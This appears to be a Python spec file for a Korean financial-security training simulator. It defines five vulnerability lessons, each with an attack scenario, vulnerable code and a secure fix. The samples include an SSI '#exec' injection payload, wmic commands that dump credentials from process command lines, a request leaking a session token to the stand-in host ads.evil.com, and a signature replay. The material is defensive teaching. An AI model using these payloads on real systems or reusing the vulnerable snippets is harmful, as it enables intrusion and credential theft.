# -*- coding: utf-8 -*-
# 금융보안원 제2026-1호 평가기준 시뮬레이터 스펙 (5종)

SPECS = [
    {
        'file': '07_fin-cmdline-exposure.html',
        'title': '명령줄 중요정보 평문 노출 방지',
        'icon': '🖥️',
        'target': 'HTS 실행 런처 프로세스',
        'risk': '4',
        'item_code': 'HTS-FIN 명령줄 평문 노출(015)',
        'attack_panel_title': 'HTS 실행 명령줄',
        'scenario_html': 'HTS 런처가 세션키와 비밀번호를 <b>명령줄 인자</b>로 전달하면, 같은 PC의 다른 프로세스가 <b>프로세스 목록(tasklist)</b>에서 평문으로 읽어낼 수 있습니다.',
        'attack_name': '프로세스 목록 스니핑',
        'attack_sub': 'tasklist / wmic process 로 명령줄 인자 덤프',
        'normal_req': 'C:\\\\HTS\\\\hts.exe --user=kim --pw=Secr3tPass! --sessionkey=AB12CD34',
        'attack_req': '> wmic process get CommandLine\n> tasklist /v\nhts.exe  --user=kim --pw=Secr3tPass! --sessionkey=AB12CD34',
        'vuln_logs_js': "addLog('[ATTACKER] wmic process get CommandLine 실행','warn'); addLog('[LEAK] hts.exe 명령줄에서 pw 평문 노출','error'); addLog('[LEAK] sessionkey 탈취 완료','error');",
        'breach_html': '<strong>🚨 인증정보 탈취</strong><br>프로세스 목록에서 <b>비밀번호와 세션키</b>가 평문으로 노출되어 계정이 탈취되었습니다.',
        'violations': [
            '금융보안원 평가기준 HTS-FIN 명령줄 평문 노출(015) (위험도 4)',
            '중요정보 평문 처리 금지 위반',
            '전자금융감독규정 제15조(해킹 등 방지대책) 미흡',
        ],
        'defense_intro': '비밀정보를 <strong>명령줄 인자</strong>로 넘기지 말고, <strong>표준입력(stdin)이나 보안 IPC 채널</strong>로 전달해야 합니다. 아래 코드를 보완하세요.',
        'vuln_code': '// [취약] 비밀번호를 명령줄 인자로 전달\nProcess p = Runtime.getRuntime().exec(\n    "hts.exe --user=" + user + " --pw=" + password + " --sessionkey=" + key);',
        'secure_hint': '// [안전] 명령줄에 비밀정보 금지, stdin 으로 전달\nProcessBuilder pb = new ProcessBuilder("hts.exe", "--user=" + user);\nProcess p = pb.start();\ntry (Writer w = new OutputStreamWriter(p.getOutputStream())) {\n    w.write(password + "\\n" + oneTimeToken + "\\n"); // stdin 보안 채널\n}',
        'checks': [['ProcessBuilder'], ['stdin', 'getOutputStream', 'oneTimeToken']],
        'success_msg': '비밀정보를 stdin 으로 전달하여 명령줄 노출이 차단됩니다.',
        'fail_msg': '명령줄 인자 대신 ProcessBuilder + stdin 전달로 바꿔야 합니다.',
        'kisa_ref': '<h4>1. 점검 항목</h4>중요정보 보호 &gt; <b>명령줄 중요정보 평문 노출 방지</b><h4>2. 위험 분석</h4><ul><li>tasklist/wmic 로 명령줄 인자 조회 시 비밀번호·세션키 평문 노출</li></ul><h4>3. 조치 방법</h4><ul><li>명령줄에 비밀정보 전달 금지</li><li>stdin·IPC 보안 채널, <b>일회성 토큰</b> 사용</li></ul>',
        'easy': '프로그램을 켜는 <b>명령어 한 줄에 비밀번호를 적으면</b> 옆 사람이 화면을 들여다보듯 다 보입니다. 비밀번호는 따로 <b>몰래 입력</b>받아야 합니다.',
    },
    {
        'file': '07_fin-credential-reuse.html',
        'title': '이용자 인증정보 재사용 방지',
        'icon': '🔑',
        'target': '전자서명 인증 검증 API',
        'risk': '5',
        'item_code': 'WEB-SER 인증정보 재사용(004)',
        'attack_panel_title': '인증값 검증 요청',
        'scenario_html': '전자서명값이나 OTP 같은 <b>일회성 인증값</b>을 서버가 한 번만 소비하지 않으면, 중간자가 가로챈 인증값을 <b>재전송</b>해 인증 단계를 그대로 통과할 수 있습니다.',
        'attack_name': '인증값 재전송(Replay)',
        'attack_sub': '캡처한 전자서명값을 동일하게 재전송',
        'normal_req': 'POST /auth/verify\n{\n  "userId": "kim",\n  "signValue": "MEUCIQDsig...AB12",\n  "nonce": "N-77231"\n}',
        'attack_req': 'POST /auth/verify   (가로채 재전송)\n{\n  "userId": "kim",\n  "signValue": "MEUCIQDsig...AB12",\n  "nonce": "N-77231"\n}',
        'vuln_logs_js': "addLog('[MITM] 전자서명값 캡처','warn'); addLog('[REPLAY] 동일 인증값 재전송','warn'); addLog('[AUTH] 재사용 인증값으로 로그인 성공','error');",
        'breach_html': '<strong>🚨 인증 우회</strong><br>한 번 쓰인 인증값이 다시 통과되어 공격자가 <b>본인 인증을 가로채</b> 로그인했습니다.',
        'violations': [
            '금융보안원 평가기준 WEB-SER 인증정보 재사용(004) (위험도 5)',
            '일회성 인증값 재사용 방지 위반',
            '전자금융감독규정 제34조(전자서명) 미흡',
        ],
        'defense_intro': '서버는 인증값을 <strong>한 번만 소비</strong>하고, <strong>challenge nonce와 유효시간</strong>을 검증해야 합니다. 아래 코드를 보완하세요.',
        'vuln_code': '// [취약] 인증값을 검증만 하고 재사용을 막지 못함\npublic boolean verify(AuthReq req) {\n    return signature.isValid(req.getUserId(), req.getSignValue());\n}',
        'secure_hint': '// [안전] 인증값 일회성 소비 + nonce/유효시간 검증\nprivate final Set<String> usedAuthValue = ConcurrentHashMap.newKeySet();\npublic boolean verify(AuthReq req) {\n    if (!challenge.isFresh(req.getNonce()))\n        throw new SecurityException("만료된 challenge");\n    if (!usedAuthValue.add(req.getSignValue()))\n        throw new SecurityException("재사용된 인증값");\n    return signature.isValid(req.getUserId(), req.getSignValue());\n}',
        'checks': [['usedAuthValue'], ['isFresh', 'getNonce']],
        'success_msg': '인증값 일회성 소비와 nonce 검증으로 재사용이 차단됩니다.',
        'fail_msg': '인증값 사용이력(usedAuthValue) 소비와 nonce 신선도 검증을 추가해야 합니다.',
        'kisa_ref': '<h4>1. 점검 항목</h4>인증 검증 &gt; <b>이용자 인증정보 재사용 방지</b><h4>2. 위험 분석</h4><ul><li>가로챈 전자서명값·OTP 재전송으로 인증 단계 우회</li></ul><h4>3. 조치 방법</h4><ul><li>인증값 <b>일회성 소비</b>(서버 사용이력)</li><li><b>challenge nonce</b>·유효시간 검증</li></ul>',
        'easy': '한 번 쓴 <b>일회용 비밀번호</b>를 또 받아주면 누가 그걸 베껴 쓸 수 있습니다. 서버는 쓴 번호를 <b>기억하고 다시는 받지 말아야</b> 합니다.',
    },
    {
        'file': '07_fin-external-info-leak.html',
        'title': '외부사이트에 의한 시스템 운영정보 노출',
        'icon': '🌐',
        'target': '인터넷뱅킹 거래내역 페이지',
        'risk': '3',
        'item_code': 'WEB-SER 외부 운영정보 노출(011)',
        'attack_panel_title': '외부 리소스 요청',
        'scenario_html': '민감정보를 URL에 담은 페이지에서 <b>외부 리소스</b>를 로딩하면, 브라우저가 <b>Referer 헤더</b>에 내부 URL과 토큰을 실어 외부 사이트 로그로 유출합니다.',
        'attack_name': 'Referer 헤더 유출',
        'attack_sub': '외부 추적 스크립트가 Referer 로 내부 URL 수집',
        'normal_req': 'GET https://bank.local/tx?token=SESS-AB12&acct=110-22\nReferer: https://bank.local/dashboard',
        'attack_req': 'GET https://ads.evil.com/track.js\nReferer: https://bank.local/tx?token=SESS-AB12&acct=110-22',
        'vuln_logs_js': "addLog('[PAGE] 외부 추적 스크립트 로드','warn'); addLog('[LEAK] Referer 에 내부 URL+token 포함','error'); addLog('[EXT-LOG] ads.evil.com 에 운영정보 기록됨','error');",
        'breach_html': '<strong>🚨 운영정보 유출</strong><br>외부 사이트 로그에 <b>내부 URL과 세션 토큰</b>이 그대로 남아 거래 정보가 노출되었습니다.',
        'violations': [
            '금융보안원 평가기준 WEB-SER 외부 운영정보 노출(011) (위험도 3)',
            '시스템 운영정보 외부 노출 방지 위반',
            '전자금융감독규정 제15조(정보보호대책) 미흡',
        ],
        'defense_intro': '<strong>Referrer-Policy</strong>로 외부 전송을 차단하고, URL에 민감정보를 담지 않으며 외부로 토큰을 넘기지 말아야 합니다. 아래 코드를 보완하세요.',
        'vuln_code': '// [취약] Referer 정책 없음, URL 에 토큰 노출 허용\nresponse.setHeader("Content-Type", "text/html");\n// 외부 스크립트 로딩 시 전체 URL 이 Referer 로 전송됨',
        'secure_hint': '// [안전] Referrer-Policy 적용 + URL 민감정보 제거\nresponse.setHeader("Referrer-Policy", "no-referrer");\nresponse.setHeader("Content-Security-Policy", "connect-src self");\n// 토큰은 URL 이 아닌 본문/헤더로만 전달 (URL 에 token 미포함)',
        'checks': [['Referrer-Policy', 'no-referrer'], ['Content-Security-Policy']],
        'success_msg': 'Referrer-Policy 적용으로 외부로의 운영정보 노출이 차단됩니다.',
        'fail_msg': 'Referrer-Policy(no-referrer) 헤더와 CSP 적용, URL 민감정보 제거가 필요합니다.',
        'kisa_ref': '<h4>1. 점검 항목</h4>정보 노출 &gt; <b>외부사이트에 의한 시스템 운영정보 노출</b><h4>2. 위험 분석</h4><ul><li>Referer 헤더·외부 리소스로 내부 URL·토큰·운영정보가 외부 로그로 유출</li></ul><h4>3. 조치 방법</h4><ul><li><b>Referrer-Policy</b> 설정</li><li>외부로 토큰 전달 금지, URL 에 민감정보 배제</li></ul>',
        'easy': '내부 주소가 적힌 종이를 든 채 <b>바깥 가게에 들어가면</b> 그 가게 장부에 내 주소가 적힙니다. 주소를 가리고(<b>Referrer-Policy</b>) 비밀 번호표는 주소에 적지 말아야 합니다.',
    },
    {
        'file': '07_fin-ssi.html',
        'title': 'SSI Injection',
        'icon': '📄',
        'target': '고객센터 게시판 렌더링',
        'risk': '4',
        'item_code': 'WEB-SER SSI Injection(018)',
        'attack_panel_title': '게시글 입력',
        'scenario_html': '사용자 입력이 <b>SSI(Server Side Includes) 지시자</b>로 그대로 평가되면, <b>&lt;!--#exec--&gt;</b> 같은 지시자로 서버 명령 실행이나 내부 파일 노출이 발생합니다.',
        'attack_name': 'SSI 지시자 주입',
        'attack_sub': '입력에 #exec / #include 지시자 삽입',
        'normal_req': 'POST /board/write\n{\n  "title": "문의드립니다",\n  "body": "비밀번호 변경 방법을 알려주세요"\n}',
        'attack_req': 'POST /board/write\n{\n  "title": "hack",\n  "body": "<!--#exec cmd=\\"id\\"-->"\n}',
        'vuln_logs_js': "addLog('[INPUT] 게시글에 SSI 지시자 #exec 포함','warn'); addLog('[SSI] 서버가 exec cmd 평가','error'); addLog('[RCE] id 명령 실행 결과 노출 uid=0','error');",
        'breach_html': '<strong>🚨 SSI 인젝션 성공</strong><br>게시글에 넣은 <b>#exec 지시자</b>가 서버에서 실행되어 <b>명령 실행 결과</b>가 노출되었습니다.',
        'violations': [
            '금융보안원 평가기준 WEB-SER SSI Injection(018) (위험도 4)',
            '서버 측 지시자 평가에 의한 명령 실행 위반',
            '전자금융감독규정 제15조(해킹 등 방지대책) 미흡',
        ],
        'defense_intro': '템플릿에서 <strong>SSI 처리를 비활성화</strong>하고, 사용자 입력을 <strong>이스케이프/검증</strong>해야 합니다. 아래 코드를 보완하세요.',
        'vuln_code': '// [취약] 사용자 입력을 SSI 가 켜진 페이지에 그대로 출력\nString page = "<html><body>" + req.getBody() + "</body></html>";\nssiEngine.render(page); // #exec 지시자가 평가됨',
        'secure_hint': '// [안전] SSI 비활성화 + 입력 이스케이프/검증\nssiEngine.disableSsi(); // Options -Includes\nString safe = StringEscapeUtils.escapeHtml4(req.getBody());\nif (safe.contains("#exec") || safe.contains("#include"))\n    throw new SecurityException("SSI 지시자 차단");\nString page = "<html><body>" + safe + "</body></html>";',
        'checks': [['disableSsi'], ['escapeHtml4', 'escapeHtml']],
        'success_msg': 'SSI 비활성화와 입력 이스케이프로 지시자 주입이 차단됩니다.',
        'fail_msg': 'SSI 비활성화(disableSsi)와 입력 이스케이프(escapeHtml)를 추가해야 합니다.',
        'kisa_ref': '<h4>1. 점검 항목</h4>인젝션 &gt; <b>SSI Injection</b><h4>2. 위험 분석</h4><ul><li>사용자 입력이 서버 SSI 지시자로 평가되어 명령 실행·파일 노출</li></ul><h4>3. 조치 방법</h4><ul><li>SSI <b>비활성화</b>(Options -Includes)</li><li>입력 <b>이스케이프/검증</b></li></ul>',
        'easy': '손님이 쓴 글에 <b>마법 주문</b>이 들어 있으면 서버가 그대로 명령을 따릅니다. 주문 기능을 <b>꺼두고</b> 글자는 <b>그냥 글자로만</b> 보여줘야 합니다.',
    },
    {
        'file': '07_fin-dir-listing.html',
        'title': '디렉토리 목록 노출 방지',
        'icon': '📂',
        'target': '웹서버 정적 자원 디렉터리',
        'risk': '3',
        'item_code': 'WEB-SER 디렉토리 목록(029)',
        'attack_panel_title': '디렉터리 요청',
        'scenario_html': '웹서버에 <b>디렉터리 인덱싱(autoindex)</b>이 켜져 있으면, 기본문서가 없는 폴더 접근 시 <b>백업·설정 파일 목록</b>이 그대로 노출됩니다.',
        'attack_name': '디렉터리 인덱싱 열람',
        'attack_sub': '기본문서 없는 폴더 직접 요청',
        'normal_req': 'GET /assets/logo.png HTTP/1.1\nHost: bank.local',
        'attack_req': 'GET /backup/ HTTP/1.1\nHost: bank.local\n\nIndex of /backup\n  config.bak\n  db_dump.sql\n  .env',
        'vuln_logs_js': "addLog('[ATTACKER] GET /backup/ 요청','warn'); addLog('[AUTOINDEX] 디렉터리 목록 응답','error'); addLog('[LEAK] config.bak db_dump.sql .env 노출','error');",
        'breach_html': '<strong>🚨 디렉터리 노출</strong><br>인덱싱이 켜져 <b>백업·설정 파일 목록</b>이 그대로 노출되어 민감정보가 유출되었습니다.',
        'violations': [
            '금융보안원 평가기준 WEB-SER 디렉토리 목록(029) (위험도 3)',
            '디렉터리 인덱싱에 의한 정보 노출 위반',
            '전자금융감독규정 제15조(정보보호대책) 미흡',
        ],
        'defense_intro': '웹서버에서 <strong>디렉터리 인덱싱을 비활성화</strong>하고 <strong>기본문서를 지정</strong>해야 합니다. 아래 설정을 보완하세요.',
        'vuln_code': '// [취약] 디렉터리 인덱싱 활성화 (Apache httpd.conf)\n<Directory "/var/www/html">\n    Options Indexes FollowSymLinks\n    AllowOverride None\n</Directory>',
        'secure_hint': '// [안전] 인덱싱 비활성화 + 기본문서 지정\n<Directory "/var/www/html">\n    Options -Indexes FollowSymLinks\n    AllowOverride None\n    DirectoryIndex index.html\n</Directory>',
        'checks': [['Options -Indexes', '-Indexes'], ['DirectoryIndex']],
        'success_msg': '인덱싱 비활성화와 기본문서 지정으로 디렉터리 목록 노출이 차단됩니다.',
        'fail_msg': 'Options -Indexes 와 DirectoryIndex 기본문서 지정이 필요합니다.',
        'kisa_ref': '<h4>1. 점검 항목</h4>정보 노출 &gt; <b>디렉토리 목록 노출 방지</b><h4>2. 위험 분석</h4><ul><li>디렉터리 인덱싱으로 백업·설정 파일 목록 노출</li></ul><h4>3. 조치 방법</h4><ul><li><b>Options -Indexes</b>(autoindex off)</li><li><b>기본문서(DirectoryIndex)</b> 지정</li></ul>',
        'easy': '문서가 없는 방 문을 열면 <b>창고 안 물건 목록이 다 보이는</b> 셈입니다. 목록 보기를 <b>끄고</b> 대신 <b>안내문(기본문서)</b>을 걸어둬야 합니다.',
    },
]
